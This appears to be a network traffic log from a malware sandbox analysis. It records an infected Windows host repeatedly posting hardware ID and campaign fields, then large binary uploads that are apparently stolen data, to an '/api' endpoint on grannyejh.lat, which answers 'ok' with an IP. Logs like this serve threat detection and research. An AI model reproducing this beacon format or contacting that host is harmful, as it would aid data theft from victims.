2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 75 67 77 51 5a 4d 6c 45 45 71 74 50 44 49 54 63 5a 6d 31 4c 58 42 76 37 57 57 7a 42 51 78 59 30 7a 6a 4b 72 68 54 42 6f 36 63 4e 4a 48 43 44 30 71 61 55 6d 57 68 72 4e 6b 44 7a 47 47 62 35 70 4f 7a 74 70 4c 50 48 44 56 6a 54 71 4a 6f 39 6c 4d 62 78 38 78 38 74 73 34 45 51 70 68 4b 4b 72 2f 6d 78 55 62 50 61 74 2b 34 33 50 2f 32 30 73 63 49 65 54 41 47 6a 45 50 4e 46 6a 2f 30 68 47 76 71 31 6b 42 4e 6c 51 52 39 2f 75 37 44 54 38 4e 69 33 62 66 66 74 62 47 5a 7a 42 73 39 5a 45 2b 6d 59 76 6c 52 47 38 2f 41 65 4b 37 4a 41 30 6d 57 53 79 71 32 6f 6f 34 44 7a 48 57 62 35 70 4f 61 72 35 6e 4f 46 6e 6c 33 43 4c 6f 6b 2f 31 68 65 6c 6f 52 34 72 63 6b 47 54 35 56 46 49 37 62 6e 79 45 66 4b 61 39 32 39 33 4c 75 39 6b 38 38 55 4e 57 5a 4d 6f 6d 58 30 58 78 48 46 77 Data Ascii: ugwQZMlEEqtPDITcZm1LXBv7WWzBQxY0zjKrhTBo6cNJHCD0qaUmWhrNkDzGGb5pOztpLPHDVjTqJo9lMbx8x8ts4EQphKKr/mxUbPat+43P/20scIeTAGjEPNFj/0hGvq1kBNlQR9/u7DT8Ni3bfftbGZzBs9ZE+mYvlRG8/AeK7JA0mWSyq2oo4DzHWb5pOar5nOFnl3CLok/1heloR4rckGT5VFI7bnyEfKa9293Lu9k88UNWZMomX0XxHFw
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 4d 54 4a 5a 43 4a 4c 76 6f 7a 45 54 4f 5a 74 53 79 6b 2f 48 34 6c 64 68 51 59 53 68 6f 71 48 66 76 56 78 44 46 30 6d 2f 6b 30 45 35 54 32 55 4d 70 2f 72 71 41 51 4d 42 6d 33 37 37 66 76 37 79 66 77 41 49 32 62 30 47 71 62 2b 70 65 47 63 6e 50 66 4b 2f 41 42 6c 69 56 53 6a 65 37 38 4e 49 44 68 53 33 63 70 70 50 6e 2b 4b 54 48 41 43 6c 72 42 4a 4a 79 2b 30 49 56 77 38 67 30 75 34 45 5a 43 70 35 49 5a 65 61 69 78 6b 7a 43 62 74 53 2f 32 72 4f 31 6c 38 6b 56 4f 47 35 43 71 57 37 34 55 68 6a 50 77 58 36 6e 7a 67 70 44 6e 6b 77 69 76 66 43 41 44 59 74 71 77 2f 36 4c 2f 35 47 56 30 68 34 70 4b 46 6e 74 66 62 68 54 45 6f 36 63 4e 4b 44 46 44 30 36 65 53 43 4f 37 35 4d 31 43 78 47 7a 62 73 64 65 30 73 5a 54 42 48 54 78 6c 51 72 46 75 38 31 73 53 78 38 68 35 35 49 Data Ascii: MTJZCJLvozETOZtSyk/H4ldhQYShoqHfvVxDF0m/k0E5T2UMp/rqAQMBm377fv7yfwAI2b0Gqb+peGcnPfK/ABliVSje78NIDhS3cppPn+KTHAClrBJJy+0IVw8g0u4EZCp5IZeaixkzCbtS/2rO1l8kVOG5CqW74UhjPwX6nzgpDnkwivfCADYtqw/6L/5GV0h4pKFntfbhTEo6cNKDFD06eSCO75M1CxGzbsde0sZTBHTxlQrFu81sSx8h55I
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 53 79 61 73 34 38 5a 52 79 32 44 52 72 4e 6d 30 76 5a 2f 4e 48 54 70 75 51 4b 68 6f 36 6c 30 65 7a 63 38 30 36 6f 38 48 55 74 6b 63 5a 5a 33 31 31 6b 6e 4d 59 63 32 31 30 72 79 75 6e 39 42 51 64 79 68 58 70 48 57 34 44 41 6a 65 30 33 4f 37 67 52 6b 4b 6e 6b 68 6c 35 71 4c 47 53 73 31 71 33 62 44 42 75 72 36 64 7a 78 6b 77 62 45 36 67 5a 50 78 51 47 63 76 48 65 4b 2f 49 41 30 57 64 54 53 75 33 37 59 41 4e 69 32 72 44 2f 6f 76 2f 6d 59 6e 44 48 44 51 6f 57 65 31 39 75 46 4d 53 6a 70 77 30 71 4d 45 46 53 70 4e 43 49 62 76 6b 79 6b 62 4c 5a 74 69 78 31 37 6d 38 6e 63 41 62 4d 47 6c 41 70 6d 37 7a 55 68 50 4e 77 6e 4c 6b 67 55 42 4e 67 51 52 39 2f 73 4c 62 54 73 64 71 6d 36 47 64 70 76 69 56 7a 46 42 68 4b 45 32 76 59 50 39 55 45 38 33 4d 63 61 44 46 42 55 71 Data Ascii: Syas48ZRy2DRrNm0vZ/NHTpuQKho6l0ezc806o8HUtkcZZ311knMYc210ryun9BQdyhXpHW4DAje03O7gRkKnkhl5qLGSs1q3bDBur6dzxkwbE6gZPxQGcvHeK/IA0WdTSu37YANi2rD/ov/mYnDHDQoWe19uFMSjpw0qMEFSpNCIbvkykbLZtix17m8ncAbMGlApm7zUhPNwnLkgUBNgQR9/sLbTsdqm6GdpviVzFBhKE2vYP9UE83McaDFBUq
2024-12-18 12:43:03 UTC	293	IN	Data Raw: 2b 75 41 44 59 74 71 7a 66 36 4c 2f 34 62 53 30 68 4d 70 61 30 6d 79 57 72 67 4d 42 2f 43 45 66 37 4c 49 45 45 6d 50 54 79 69 79 38 2f 34 44 6b 7a 6d 4a 37 49 48 74 36 6f 32 41 44 77 59 6d 42 71 49 6b 6f 47 30 48 6a 74 49 30 2f 4a 31 4f 43 6f 73 45 66 66 36 6c 77 31 48 5a 61 39 69 6f 30 50 69 47 72 4f 63 47 4d 32 39 57 70 48 50 33 46 46 43 4f 79 7a 54 38 39 6b 42 44 6e 6c 38 30 71 4f 2f 51 52 49 74 53 6c 66 37 4c 2f 2b 44 53 39 52 4d 33 5a 6b 47 31 64 62 56 7a 43 4d 54 44 5a 4b 50 59 44 77 72 58 42 43 50 2b 75 70 4d 4e 69 32 6e 4b 2f 6f 76 76 36 73 6d 56 51 32 34 34 46 4c 77 71 34 52 51 49 6a 70 77 6d 36 6f 38 53 43 73 45 45 59 72 33 77 30 6b 58 49 65 39 6a 35 37 59 47 66 69 4d 30 57 4c 6e 6c 34 6e 57 50 69 57 52 6a 5a 31 54 69 78 7a 41 35 45 6e 6c 4a 6c Data Ascii: +uADYtqzf6L/4bS0hMpa0myWrgMB/CEf7LIEEmPTyiy8/4DkzmJ7IHt6o2ADwYmBqIkoG0HjtI0/J1OCosEff6lw1HZa9io0PiGrOcGM29WpHP3FFCOyzT89kBDnl80qO/QRItSlf7L/+DS9RM3ZkG1dbVzCMTDZKPYDwrXBCP+upMNi2nK/ovv6smVQ244FLwq4RQIjpwm6o8SCsEEYr3w0kXIe9j57YGfiM0WLnl4nWPiWRjZ1TixzA5EnlJl
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 31 30 36 32 0d 0a 42 6c 32 49 42 47 76 2b 35 49 41 62 6d 79 4f 62 75 73 4c 2f 34 4d 4b 53 53 32 77 37 45 66 4d 32 35 78 6f 48 6a 74 49 30 2f 4a 31 4f 43 6f 73 45 66 66 36 6c 77 31 48 5a 61 39 69 6f 30 50 69 47 72 4f 34 58 50 32 31 42 73 79 62 57 58 77 72 4a 68 44 72 6b 77 45 41 53 6f 41 52 74 2f 74 32 4f 41 39 4d 74 67 2f 37 6d 76 4c 61 63 78 77 59 6f 4a 57 69 6b 59 76 31 54 44 6f 7a 71 66 37 44 49 51 41 54 5a 51 6d 58 6d 73 6f 34 44 7a 33 79 62 35 6f 50 74 34 38 65 54 52 32 6b 36 57 65 31 39 75 45 4a 65 6c 70 59 36 35 4e 31 41 45 74 6b 44 4a 71 7a 77 78 6b 44 64 62 70 79 41 37 62 79 75 6e 38 38 62 4f 46 5a 34 6a 57 6e 35 56 78 43 4d 39 57 4b 70 33 77 4e 50 6e 6e 6f 62 73 4f 58 55 52 4d 56 72 32 2f 36 64 2f 37 66 53 6d 43 6c 35 49 41 61 63 4b 72 68 4d 58 Data Ascii: 1062Bl2IBGv+5IAbmyObusL/4MKSS2w7EfM25xoHjtI0/J1OCosEff6lw1HZa9io0PiGrO4XP21BsybWXwrJhDrkwEASoARt/t2OA9Mtg/7mvLacxwYoJWikYv1TDozqf7DIQATZQmXmso4Dz3yb5oPt48eTR2k6We19uEJelpY65N1AEtkDJqzwxkDdbpyA7byun88bOFZ4jWn5VxCM9WKp3wNPnnobsOXURMVr2/6d/7fSmCl5IAacKrhMX
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 7a 6e 31 4a 56 31 31 31 6c 71 4b 4b 59 45 59 55 74 79 66 36 4c 2f 2f 2b 52 30 67 49 2f 61 31 43 67 49 38 5a 71 4f 63 44 44 64 62 4c 66 44 55 61 34 52 7a 53 30 33 50 35 57 79 47 50 56 75 63 57 75 2b 4e 79 41 48 33 6b 77 66 2b 4d 73 75 47 74 51 6a 74 77 30 2f 49 38 31 53 5a 64 4b 49 71 6a 7a 6a 57 54 46 61 74 71 6f 77 37 4b 30 73 38 4d 42 4d 79 67 49 34 32 4b 34 44 45 79 41 68 48 43 31 6a 31 67 61 79 78 39 77 37 62 57 51 45 64 51 6a 77 76 37 46 2f 2b 44 41 6a 6c 41 72 4b 42 37 6a 49 2f 74 47 44 4d 6a 48 59 71 65 49 50 6e 53 38 55 79 61 75 35 4d 4e 39 39 55 62 58 75 4e 53 6c 76 35 54 6d 4d 48 6b 6d 42 71 77 6b 6f 47 31 65 68 6f 52 4c 36 6f 38 59 43 73 45 45 45 4c 33 73 7a 6b 54 64 66 4a 61 62 78 4c 79 6f 6c 4d 4e 51 64 79 68 41 34 7a 79 6f 47 6c 37 4b 31 54 Data Ascii: zn1JV111lqKKYEYUtyf6L//+R0gI/a1CgI8ZqOcDDdbLfDUa4RzS03P5WyGPVucWu+NyAH3kwf+MsuGtQjtw0/I81SZdKIqjzjWTFatqow7K0s8MBMygI42K4DEyAhHC1j1gayx9w7bWQEdQjwv7F/+DAjlArKB7jI/tGDMjHYqeIPnS8Uyau5MN99UbXuNSlv5TmMHkmBqwkoG1ehoRL6o8YCsEEEL3szkTdfJabxLyolMNQdyhA4zyoGl7K1T

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.8	50103	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:04 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=092VHHTONI1OTU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12827 Host: grannyejh.lat
2024-12-18 12:43:04 UTC	12827	OUT	Data Raw: 2d 2d 30 39 32 56 48 48 54 4f 4e 49 31 4f 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 30 39 32 56 48 48 54 4f 4e 49 31 4f 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 39 32 56 48 48 54 4f 4e 49 31 4f 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 30 39 32 Data Ascii: --092VHHTONI1OTUContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--092VHHTONI1OTUContent-Disposition: form-data; name="pid"2--092VHHTONI1OTUContent-Disposition: form-data; name="lid"yau6Na--6989783370--092
2024-12-18 12:43:07 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v74o8nv8ot58qi7u0r8f84fel1; expires=Sun, 13-Apr-2025 06:29:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYCDZbbk%2FTgS8sotDtrg%2B%2F1Ye0tBi4gnby9KO4Ufd7T9iKE2xJgospX2Cgkka4rhMHV5L%2FL7hxQKz%2FfcFVRNf6icI5UuScW2Wb7Oe1VwbfKSNeXJ7nUnZRRCB9wzWWLP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3c8cebeac470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1542&rtt_var=599&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13760&delivery_rate=1794714&cwnd=232&unsent_bytes=0&cid=d077e02d5eaf94dc&ts=2741&x=0"
2024-12-18 12:43:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:43:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.8	50106	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:08 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3J6VJWNKQRE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15038 Host: grannyejh.lat
2024-12-18 12:43:08 UTC	15038	OUT	Data Raw: 2d 2d 33 4a 36 56 4a 57 4e 4b 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 33 4a 36 56 4a 57 4e 4b 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4a 36 56 4a 57 4e 4b 51 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 33 4a 36 56 4a 57 4e 4b 51 52 45 0d Data Ascii: --3J6VJWNKQREContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--3J6VJWNKQREContent-Disposition: form-data; name="pid"2--3J6VJWNKQREContent-Disposition: form-data; name="lid"yau6Na--6989783370--3J6VJWNKQRE
2024-12-18 12:43:10 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9vvm0rjdoqfbgb6ni1mmlir1ph; expires=Sun, 13-Apr-2025 06:29:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bh4CkFSbdnEHkY5mBbDFJGCwXVQEHHGTptysQHIgnm2j1JXrjm%2BFmzH%2F9ubkXnFINR3XoU48%2By2MqJ5H4EhUoEzoWkypb%2F%2BWzV4xuQjpwLavbJlrPVgo7R5%2BgtS1qpgd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3ca618ef42c9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1640&rtt_var=618&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2829&recv_bytes=15968&delivery_rate=1766485&cwnd=127&unsent_bytes=0&cid=954eb93205d8593a&ts=1568&x=0"
2024-12-18 12:43:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:43:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.8	50108	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:11 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6G2IMH0JETM2GNS5D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20241 Host: grannyejh.lat
2024-12-18 12:43:11 UTC	15331	OUT	Data Raw: 2d 2d 36 47 32 49 4d 48 30 4a 45 54 4d 32 47 4e 53 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 36 47 32 49 4d 48 30 4a 45 54 4d 32 47 4e 53 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 47 32 49 4d 48 30 4a 45 54 4d 32 47 4e 53 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 Data Ascii: --6G2IMH0JETM2GNS5DContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--6G2IMH0JETM2GNS5DContent-Disposition: form-data; name="pid"3--6G2IMH0JETM2GNS5DContent-Disposition: form-data; name="lid"yau6Na--69897833
2024-12-18 12:43:11 UTC	4910	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,
2024-12-18 12:43:14 UTC	1031	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=88rhbghk83b7rpvurgfdduotst; expires=Sun, 13-Apr-2025 06:29:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hgLAR63I1O5CPnZfhJ8NdqOOHPWVWydhyUwkBcXAONumE%2FNd%2Fo8X8NNt8LvYg4Bxa58kwPLHizsfsWsinAlHTsMC5WUMOa1E11ZdWUpAAtVviyY7U9OQyNbwKMpG0ij"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3cb81a23436f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1725&rtt_var=682&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21199&delivery_rate=1564844&cwnd=182&unsent_bytes=0&cid=8ad47725247b1b78&ts=3159&x=0"
2024-12-18 12:43:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:43:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.8	50110	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:16 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T6FH88Q677TWY1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1262 Host: grannyejh.lat
2024-12-18 12:43:16 UTC	1262	OUT	Data Raw: 2d 2d 54 36 46 48 38 38 51 36 37 37 54 57 59 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 54 36 46 48 38 38 51 36 37 37 54 57 59 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 36 46 48 38 38 51 36 37 37 54 57 59 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 54 36 46 Data Ascii: --T6FH88Q677TWY1Content-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--T6FH88Q677TWY1Content-Disposition: form-data; name="pid"1--T6FH88Q677TWY1Content-Disposition: form-data; name="lid"yau6Na--6989783370--T6F
2024-12-18 12:43:17 UTC	1028	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1qoc2tdr9ekudm79umqkq3chk; expires=Sun, 13-Apr-2025 06:29:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rajwIZPjKjDqS7Sg7%2BBlCHsUrGMfvMEXERxetBEdevxYd0b5d8HivQP2rzmJ0PtX1J5A4CGVxseNnZbGge1TYa45fLeB1DszltuhDK6fDlR%2BBX0Iwu2rlnUoee0OZ90q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3cd41f9a6a50-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2031&rtt_var=765&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2172&delivery_rate=1428571&cwnd=234&unsent_bytes=0&cid=691a5fd17b6baaef&ts=1322&x=0"
2024-12-18 12:43:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:43:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.8	50112	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:19 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LQQ9XYIGJXD0K5MUYG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585221 Host: grannyejh.lat
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 2d 2d 4c 51 51 39 58 59 49 47 4a 58 44 30 4b 35 4d 55 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 4c 51 51 39 58 59 49 47 4a 58 44 30 4b 35 4d 55 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 51 51 39 58 59 49 47 4a 58 44 30 4b 35 4d 55 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 Data Ascii: --LQQ9XYIGJXD0K5MUYGContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--LQQ9XYIGJXD0K5MUYGContent-Disposition: form-data; name="pid"1--LQQ9XYIGJXD0K5MUYGContent-Disposition: form-data; name="lid"yau6Na--69897
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 26 d5 b6 a3 eb 52 62 a8 31 29 4c fd 46 16 26 fe ea b7 32 9d ce 90 e4 e0 e7 61 29 12 a6 48 ea 91 6d 35 8c 44 ba 1d d8 5c 29 37 b8 c2 34 5f d9 4f ae de 39 3e fc 0e 5d 2a eb f1 cc 47 e3 0e cb d3 0c dc 24 18 66 63 62 17 52 68 92 67 4a 1c d4 d5 3d 85 e3 47 fb 22 30 d7 89 d2 ed 87 1d 19 28 62 d7 e4 d7 f3 a8 2b 49 a3 4a e8 0e 82 6e 6f 94 0b 16 c6 f7 ad 5d 71 00 94 80 b9 68 f9 be e7 c1 9a de ca ab 47 c3 fa 4b ce ca 40 ac 84 b5 99 37 3b 2b 75 f1 b3 c1 9c 3e fc 72 c0 8c a7 36 0d b0 4a c4 7e 35 3c 14 db 84 fc dc 55 b0 4d 8f ed d9 aa 30 fb 02 07 72 d2 50 34 b4 10 c5 7f 09 55 db 8a ac c9 08 df 88 00 5b 2a 32 22 e1 ac a9 d2 c3 13 a8 a9 6c cc ff b3 c9 09 79 90 05 46 3f 3c 41 10 1a d4 53 fe db 01 d3 8e 83 45 e8 6a ee 59 51 d1 65 d6 b3 9d 59 ef 44 20 e1 df 64 b3 3b 56 2c Data Ascii: &Rb1)LF&2a)Hm5D\)74_O9>]G$fcbRhgJ=G"0(b+IJno]qhGK@7;+u>r6J~5<UM0rP4U[2"lyF?<ASEjYQeYD d;V,
